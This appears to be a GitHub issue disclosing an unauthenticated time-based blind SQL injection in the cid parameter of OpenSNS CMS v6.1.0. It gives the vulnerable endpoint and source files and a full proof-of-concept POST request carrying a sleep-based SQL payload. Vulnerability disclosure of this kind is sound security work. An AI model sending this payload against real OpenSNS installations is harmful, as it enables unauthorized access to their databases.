We read every piece of feedback, and take your input very seriously.
To see all available qualifiers, see our documentation.
Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.
By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.
Already on GitHub? Sign in to your account
OpenSNS v6.1.0 have unauthorized sleep blind injection SQL vulnerability cid parameter
this CMS offical website
http://www.opensns.cn/
vuln url
index.php?s=%2Fhome%2Faddons%2F_addons%2Fchina_city%2F_controller%2Fchina_city%2F_action%2Fgetdistrict.html
poc
POST /index.php?s=%2Fhome%2Faddons%2F_addons%2Fchina_city%2F_controller%2Fchina_city%2F_action%2Fgetdistrict.html HTTP/1.1 Host: 192.168.95.131 User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36 Content-Length: 121 Accept: */* Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,und;q=0.7 Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded; charset=UTF-8 Cookie: Origin: http://192.168.95.131 Pragma: no-cache Referer: http://192.168.95.131/uploads_download_2019-07-16_5d2d5d4697d88/index.php?s=/ucenter/config/index.html X-Requested-With: XMLHttpRequest Accept-Encoding: gzip cid%5B0%5D=%3D%28select%2Afrom%28select%2Bsleep%283%29union%2F%2A%2A%2Fselect%2B1%29a%29and+3+in+&cid%5B1%5D=3&did=110102
vuln file
Addons/ChinaCity/Controller/ChinaCityController.class.php:77
ThinkPHP/Library/Think/Db.class.php:772
from CoColi (Chaitin Tech)
The text was updated successfully, but these errors were encountered:
No branches or pull requests
OpenSNS v6.1.0 have unauthorized sleep blind injection SQL vulnerability cid parameter
A unauthorized sleep blind injection SQL vulnerability was discovered in OpenSNS CMS v6.1.0 about cid parameter
this CMS offical website
vuln url
poc
vuln file
ThinkPHP/Library/Think/Db.class.php:772
from CoColi (Chaitin Tech)
The text was updated successfully, but these errors were encountered: